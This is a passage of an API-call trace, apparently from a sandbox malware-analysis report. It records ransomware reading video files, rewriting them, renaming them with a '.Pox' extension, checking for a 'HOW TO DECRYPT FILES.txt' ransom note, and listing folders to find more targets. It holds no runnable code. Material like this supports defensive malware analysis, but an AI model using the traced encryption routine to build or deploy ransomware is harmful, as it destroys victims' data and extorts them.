(dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.434] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\gulhrt0newod_3i7h8d3.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.435] GetFileType (hFile=0x26c) returned 0x1 [0041.435] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.435] GetFileType (hFile=0x26c) returned 0x1 [0041.435] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x120a2 [0041.435] ReadFile (in: hFile=0x26c, lpBuffer=0x2519198, nNumberOfBytesToRead=0x120a2, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x2519198*, lpNumberOfBytesRead=0x3ae4fc*=0x120a2, lpOverlapped=0x0) returned 1 [0041.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.452] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.452] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.452] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.453] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4", lpFilePart=0x0) returned 0x4d [0041.453] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.453] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\gulhrt0newod_3i7h8d3.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.454] GetFileType (hFile=0x26c) returned 0x1 [0041.454] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.454] GetFileType (hFile=0x26c) returned 0x1 [0041.454] WriteFile (in: hFile=0x26c, lpBuffer=0x259c1a8*, nNumberOfBytesToWrite=0x120b0, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x259c1a8*, lpNumberOfBytesWritten=0x3ae4f0*=0x120b0, lpOverlapped=0x0) returned 1 [0041.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4", lpFilePart=0x0) returned 0x4d [0041.456] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4.Pox", lpFilePart=0x0) returned 0x51 [0041.456] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.456] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\gulhrt0newod_3i7h8d3.mp4"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e573640, ftCreationTime.dwHighDateTime=0x1d4d30b, ftLastAccessTime.dwLowDateTime=0x73e422f0, ftLastAccessTime.dwHighDateTime=0x1d4d273, ftLastWriteTime.dwLowDateTime=0x2ae556a0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x120b0)) returned 1 [0041.456] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.456] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\gulhrt0newod_3i7h8d3.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\gulHrt0neWOD_3I7h8D3.mp4.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\gulhrt0newod_3i7h8d3.mp4.pox")) returned 1 [0041.457] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4", lpFilePart=0x0) returned 0x47 [0041.457] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae448) returned 1 [0041.457] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\ulsp8p_vf-digm.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.457] GetFileType (hFile=0x26c) returned 0x1 [0041.457] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae444) returned 1 [0041.457] GetFileType (hFile=0x26c) returned 0x1 [0041.457] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae550 | out: lpFileSizeHigh=0x3ae550*=0x0) returned 0x198a [0041.457] ReadFile (in: hFile=0x26c, lpBuffer=0x25ae890, nNumberOfBytesToRead=0x198a, lpNumberOfBytesRead=0x3ae4fc, lpOverlapped=0x0 | out: lpBuffer=0x25ae890*, lpNumberOfBytesRead=0x3ae4fc*=0x198a, lpOverlapped=0x0) returned 1 [0041.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3ae068, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4c8) returned 1 [0041.505] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae544 | out: lpFileInformation=0x3ae544*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.505] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4c4) returned 1 [0041.505] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4", nBufferLength=0x105, lpBuffer=0x3adf40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4", lpFilePart=0x0) returned 0x47 [0041.505] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae434) returned 1 [0041.505] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\ulsp8p_vf-digm.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.506] GetFileType (hFile=0x26c) returned 0x1 [0041.506] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae430) returned 1 [0041.506] GetFileType (hFile=0x26c) returned 0x1 [0041.506] WriteFile (in: hFile=0x26c, lpBuffer=0x23d3bc0*, nNumberOfBytesToWrite=0x1990, lpNumberOfBytesWritten=0x3ae4f0, lpOverlapped=0x0 | out: lpBuffer=0x23d3bc0*, lpNumberOfBytesWritten=0x3ae4f0*=0x1990, lpOverlapped=0x0) returned 1 [0041.507] CloseHandle (hObject=0x26c) returned 1 [0041.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4", lpFilePart=0x0) returned 0x47 [0041.508] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4.Pox", nBufferLength=0x105, lpBuffer=0x3ae074, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4.Pox", lpFilePart=0x0) returned 0x4b [0041.508] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4d4) returned 1 [0041.508] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\ulsp8p_vf-digm.mp4"), fInfoLevelId=0x0, lpFileInformation=0x3ae550 | out: lpFileInformation=0x3ae550*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe11c9e50, ftCreationTime.dwHighDateTime=0x1d4cc0c, ftLastAccessTime.dwLowDateTime=0x1c5a0fe0, ftLastAccessTime.dwHighDateTime=0x1d4d53e, ftLastWriteTime.dwLowDateTime=0x2aec7ac0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x1990)) returned 1 [0041.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4d0) returned 1 [0041.508] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\ulsp8p_vf-digm.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\h6S9PxWHBy_gh7P\\Ulsp8p_Vf-DIGm.mp4.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\h6s9pxwhby_gh7p\\ulsp8p_vf-digm.mp4.pox")) returned 1 [0041.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1", lpFilePart=0x0) returned 0x2b [0041.509] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\", lpFilePart=0x0) returned 0x2c [0041.509] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c4d480, ftCreationTime.dwHighDateTime=0x1d4c85e, ftLastAccessTime.dwLowDateTime=0xd6aa85c0, ftLastAccessTime.dwHighDateTime=0x1d4c542, ftLastWriteTime.dwLowDateTime=0xd6aa85c0, ftLastWriteTime.dwHighDateTime=0x1d4c542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0041.510] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c4d480, ftCreationTime.dwHighDateTime=0x1d4c85e, ftLastAccessTime.dwLowDateTime=0xd6aa85c0, ftLastAccessTime.dwHighDateTime=0x1d4c542, ftLastWriteTime.dwLowDateTime=0xd6aa85c0, ftLastWriteTime.dwHighDateTime=0x1d4c542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.510] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bb23aa0, ftCreationTime.dwHighDateTime=0x1d4d406, ftLastAccessTime.dwLowDateTime=0xf7e02a10, ftLastAccessTime.dwHighDateTime=0x1d4cb37, ftLastWriteTime.dwLowDateTime=0xf7e02a10, ftLastWriteTime.dwHighDateTime=0x1d4cb37, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1EG_rMLJW", cAlternateFileName="1EG_RM~1")) returned 1 [0041.510] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e6c600, ftCreationTime.dwHighDateTime=0x1d4cd3f, ftLastAccessTime.dwLowDateTime=0x2e2becb0, ftLastAccessTime.dwHighDateTime=0x1d4c69e, ftLastWriteTime.dwLowDateTime=0x2e2becb0, ftLastWriteTime.dwHighDateTime=0x1d4c69e, nFileSizeHigh=0x0, nFileSizeLow=0x96b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="70VRtxhu8DWsBjDdMTN.avi", cAlternateFileName="70VRTX~1.AVI")) returned 1 [0041.510] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d218590, ftCreationTime.dwHighDateTime=0x1d4c931, ftLastAccessTime.dwLowDateTime=0xba863680, ftLastAccessTime.dwHighDateTime=0x1d4c53a, ftLastWriteTime.dwLowDateTime=0xba863680, ftLastWriteTime.dwHighDateTime=0x1d4c53a, nFileSizeHigh=0x0, nFileSizeLow=0x14c9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="apkT5SjumXOE.avi", cAlternateFileName="APKT5S~1.AVI")) returned 1 [0041.510] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb258c0, ftCreationTime.dwHighDateTime=0x1d4c5c9, ftLastAccessTime.dwLowDateTime=0xbd290b90, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0xbd290b90, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dXKzZEjFy-BjA", cAlternateFileName="DXKZZE~1")) returned 1 [0041.510] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bbc34a0, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xb4136950, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0xb4136950, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uFDmIkn7ZcT9-q", cAlternateFileName="UFDMIK~1")) returned 1 [0041.511] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64eefef0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0x40712d30, ftLastAccessTime.dwHighDateTime=0x1d4cd25, ftLastWriteTime.dwLowDateTime=0x40712d30, ftLastWriteTime.dwHighDateTime=0x1d4cd25, nFileSizeHigh=0x0, nFileSizeLow=0x16973, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yg_XgPbG znCpTe.avi", cAlternateFileName="YG_XGP~1.AVI")) returned 1 [0041.511] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9499eff0, ftCreationTime.dwHighDateTime=0x1d4d4e6, ftLastAccessTime.dwLowDateTime=0x658441a0, ftLastAccessTime.dwHighDateTime=0x1d4d18c, ftLastWriteTime.dwLowDateTime=0x658441a0, ftLastWriteTime.dwHighDateTime=0x1d4d18c, nFileSizeHigh=0x0, nFileSizeLow=0x156b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="_JZJfNAPJjUeZV.swf", cAlternateFileName="_JZJFN~1.SWF")) returned 1 [0041.511] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.511] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0041.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae5a4) returned 1 [0041.511] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1", nBufferLength=0x105, lpBuffer=0x3ae0ac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1", lpFilePart=0x0) returned 0x2b [0041.511] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\", nBufferLength=0x105, lpBuffer=0x3ae080, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\", lpFilePart=0x0) returned 0x2c [0041.511] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\*", lpFindFileData=0x3ae2cc | out: lpFindFileData=0x3ae2cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c4d480, ftCreationTime.dwHighDateTime=0x1d4c85e, ftLastAccessTime.dwLowDateTime=0xd6aa85c0, ftLastAccessTime.dwHighDateTime=0x1d4c542, ftLastWriteTime.dwLowDateTime=0xd6aa85c0, ftLastWriteTime.dwHighDateTime=0x1d4c542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4061c8 [0041.511] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x84c4d480, ftCreationTime.dwHighDateTime=0x1d4c85e, ftLastAccessTime.dwLowDateTime=0xd6aa85c0, ftLastAccessTime.dwHighDateTime=0x1d4c542, ftLastWriteTime.dwLowDateTime=0xd6aa85c0, ftLastWriteTime.dwHighDateTime=0x1d4c542, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.512] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2bb23aa0, ftCreationTime.dwHighDateTime=0x1d4d406, ftLastAccessTime.dwLowDateTime=0xf7e02a10, ftLastAccessTime.dwHighDateTime=0x1d4cb37, ftLastWriteTime.dwLowDateTime=0xf7e02a10, ftLastWriteTime.dwHighDateTime=0x1d4cb37, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1EG_rMLJW", cAlternateFileName="1EG_RM~1")) returned 1 [0041.512] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x83e6c600, ftCreationTime.dwHighDateTime=0x1d4cd3f, ftLastAccessTime.dwLowDateTime=0x2e2becb0, ftLastAccessTime.dwHighDateTime=0x1d4c69e, ftLastWriteTime.dwLowDateTime=0x2e2becb0, ftLastWriteTime.dwHighDateTime=0x1d4c69e, nFileSizeHigh=0x0, nFileSizeLow=0x96b4, dwReserved0=0x0, dwReserved1=0x0, cFileName="70VRtxhu8DWsBjDdMTN.avi", cAlternateFileName="70VRTX~1.AVI")) returned 1 [0041.512] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d218590, ftCreationTime.dwHighDateTime=0x1d4c931, ftLastAccessTime.dwLowDateTime=0xba863680, ftLastAccessTime.dwHighDateTime=0x1d4c53a, ftLastWriteTime.dwLowDateTime=0xba863680, ftLastWriteTime.dwHighDateTime=0x1d4c53a, nFileSizeHigh=0x0, nFileSizeLow=0x14c9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="apkT5SjumXOE.avi", cAlternateFileName="APKT5S~1.AVI")) returned 1 [0041.512] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xceb258c0, ftCreationTime.dwHighDateTime=0x1d4c5c9, ftLastAccessTime.dwLowDateTime=0xbd290b90, ftLastAccessTime.dwHighDateTime=0x1d4cf64, ftLastWriteTime.dwLowDateTime=0xbd290b90, ftLastWriteTime.dwHighDateTime=0x1d4cf64, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dXKzZEjFy-BjA", cAlternateFileName="DXKZZE~1")) returned 1 [0041.512] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7bbc34a0, ftCreationTime.dwHighDateTime=0x1d4cb24, ftLastAccessTime.dwLowDateTime=0xb4136950, ftLastAccessTime.dwHighDateTime=0x1d4c998, ftLastWriteTime.dwLowDateTime=0xb4136950, ftLastWriteTime.dwHighDateTime=0x1d4c998, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="uFDmIkn7ZcT9-q", cAlternateFileName="UFDMIK~1")) returned 1 [0041.512] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64eefef0, ftCreationTime.dwHighDateTime=0x1d4ca17, ftLastAccessTime.dwLowDateTime=0x40712d30, ftLastAccessTime.dwHighDateTime=0x1d4cd25, ftLastWriteTime.dwLowDateTime=0x40712d30, ftLastWriteTime.dwHighDateTime=0x1d4cd25, nFileSizeHigh=0x0, nFileSizeLow=0x16973, dwReserved0=0x0, dwReserved1=0x0, cFileName="Yg_XgPbG znCpTe.avi", cAlternateFileName="YG_XGP~1.AVI")) returned 1 [0041.513] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9499eff0, ftCreationTime.dwHighDateTime=0x1d4d4e6, ftLastAccessTime.dwLowDateTime=0x658441a0, ftLastAccessTime.dwHighDateTime=0x1d4d18c, ftLastWriteTime.dwLowDateTime=0x658441a0, ftLastWriteTime.dwHighDateTime=0x1d4d18c, nFileSizeHigh=0x0, nFileSizeLow=0x156b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="_JZJfNAPJjUeZV.swf", cAlternateFileName="_JZJFN~1.SWF")) returned 1 [0041.513] FindNextFileW (in: hFindFile=0x4061c8, lpFindFileData=0x3ae2dc | out: lpFindFileData=0x3ae2dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9499eff0, ftCreationTime.dwHighDateTime=0x1d4d4e6, ftLastAccessTime.dwLowDateTime=0x658441a0, ftLastAccessTime.dwHighDateTime=0x1d4d18c, ftLastWriteTime.dwLowDateTime=0x658441a0, ftLastWriteTime.dwHighDateTime=0x1d4d18c, nFileSizeHigh=0x0, nFileSizeLow=0x156b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="_JZJfNAPJjUeZV.swf", cAlternateFileName="_JZJFN~1.SWF")) returned 0 [0041.513] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0041.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae564) returned 1 [0041.513] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae570) returned 1 [0041.513] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi", nBufferLength=0x105, lpBuffer=0x3adf54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\qJcDr1\\70VRtxhu8DWsBjDdMTN.avi", lpFilePart=0x0) returned 0x43 [0041.513] 